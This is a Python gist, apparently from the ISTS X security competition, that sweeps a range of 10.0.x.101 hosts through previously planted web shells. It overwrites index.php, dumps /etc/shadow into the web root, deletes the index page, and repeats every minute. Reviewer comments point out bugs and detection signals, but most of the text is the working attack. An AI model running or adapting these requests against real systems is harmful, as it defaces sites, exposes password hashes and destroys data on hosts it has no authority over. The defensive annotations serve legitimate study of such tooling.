@antitree
Created March 25, 2013 13:53
ISTS X autoshell pwner
import requests
import time
from optparse import OptionParser
# Per-request timeout in seconds. Only shell() passes it to requests.get();
# c99() issues its request without one.
timeout = 5

# Command line: -x takes a single value. The help text calls it a host, but
# the value is handed to c99()/shell() as `group`, where it becomes the third
# octet of 10.0.<group>.101.
parser = OptionParser()
parser.add_option(
    "-x",
    dest="host",
    help="Choose an individual host to test",
)
options, args = parser.parse_args()
print(options.host)
def c99(group):
    """Send one command request to /shell.php on 10.0.<group>.101.

    The function name and the ``act=cmd`` parameters suggest the target is a
    c99-style PHP web shell (presumably already present on the host; confirm).
    URL-decoded, the query asks it to run
    ``echo "balls" > /var/www/index.php`` with ``d=/usr/lib/cgi-bin/``,
    which overwrites the site's index page.

    Args:
        group: value interpolated as the third octet of the target address.

    Returns:
        1 when the response status is 200, 2 for any other status, and 3 when
        anything inside the ``try`` raises.

    Defender view: the request is a plain GET, so on a typical web server it
    lands in the access log as ``/shell.php?act=cmd&cmd=...``; a change to
    ``/var/www/index.php`` is what file-integrity monitoring on the web root
    would report.
    """
    try:
        # NOTE(review): no timeout= here, unlike shell(); requests waits
        # indefinitely by default, so one unresponsive host stalls the caller.
        r = requests.get("http://10.0." + str(group) + ".101/shell.php?act=cmd&cmd=echo+%22balls%22+%3E+%2Fvar%2Fwww%2Findex.php&d=%2Fusr%2Flib%2Fcgi-bin%2F&submit=Execute&cmd_txt=1")
        # NOTE(review): Response.text is a property in requests, so calling it
        # raises TypeError. The bare except below maps that to 3, which means
        # the return value does not reflect the HTTP status as written.
        print(r.text())
        if r.status_code == 200:
            cresult=1
            print(cresult)
        else: cresult=2
    except:
        # Bare except: connection errors, the TypeError above and
        # KeyboardInterrupt all collapse into the same code with no logging.
        cresult=3
    return cresult
def shell(group):
    """Send two command requests to /seashell.png on 10.0.<group>.101.

    The first request carries ``cat /etc/shadow>/var/www/index.htm`` in the
    ``command`` parameter and the second carries ``rm /var/www/index.php``.
    Only the second response is inspected; the first is overwritten in ``r``.

    Args:
        group: value interpolated as the third octet of the target address.

    Returns:
        1 when the second response status is 200, 2 for any other status, and
        3 when either request (or anything else in the ``try``) raises.

    Defender view: a ``.png`` path that acts on a ``command`` query parameter
    implies the server runs that file through a script handler (presumably a
    planted backdoor; confirm against the host's handler configuration).
    Useful signals are access-log entries for an image path with a
    ``command=`` query string, password-hash lines appearing in a file under
    the web root, and the index page disappearing. If the first command works,
    the web server account can read ``/etc/shadow``, which is itself a
    privilege/permission finding.
    """
    try:
        #r = requests.get("http://10.0." + str(group) + ".101/seashell.png?command=cat /etc/shadow>/var/www/index.php", timeout=timeout)
        # Request 1: result is discarded when r is reassigned on the next line.
        r = requests.get('http://10.0.' + str(group) + '.101/seashell.png?command=cat%20/etc/shadow>/var/www/index.htm', timeout=timeout)
        # Request 2: its status code alone decides between 1 and 2.
        r = requests.get('http://10.0.' + str(group) + '.101/seashell.png?command=rm%20/var/www/index.php', timeout=timeout)
        if r.status_code == 200:
            sresult= 1
            print(sresult)
        else:
            sresult = 2
    except:
        # Bare except: timeouts, connection failures and KeyboardInterrupt are
        # indistinguishable in the returned code.
        sresult = 3
    return sresult
# NOTE(review): the page lost its indentation; the nesting below is a
# reconstruction. In particular, whether print("----") sits inside the
# per-group loop is assumed, not confirmed.
if options.host:
    # Single-target mode: run both checks once against the -x value and print
    # the raw 1/2/3 codes they return.
    print(c99(options.host))
    print(shell(options.host))
else:
    # Sweep mode: never exits; one pass per iteration, then a 60 s sleep.
    while True:
        # Rebuilt on every pass, so earlier results are not carried over.
        result = []
        # Third octets 200 through 212 (range excludes 213).
        for group in range(200,213):
            print("Trying c99 on %s" % group)
            if (c99(group)) == 1:
                result.append(group)
            print("Trying shell method %s" % group)
            # A group can be appended twice, once per method that returned 1.
            if shell(group) == 1:
                result.append(group)
            print("----")
        print("XXXXXXXXXXXXXXXXXXXXXXX")
        print("XXX GROUPS PWND XXX")
        for x in result:
            print(x)
        print(".... Waiting ....")
        # Defender view: the fixed sleep makes the same three requests recur on
        # each targeted host at a roughly regular interval (60 s plus sweep
        # time), a cadence that stands out in access logs.
        time.sleep(60)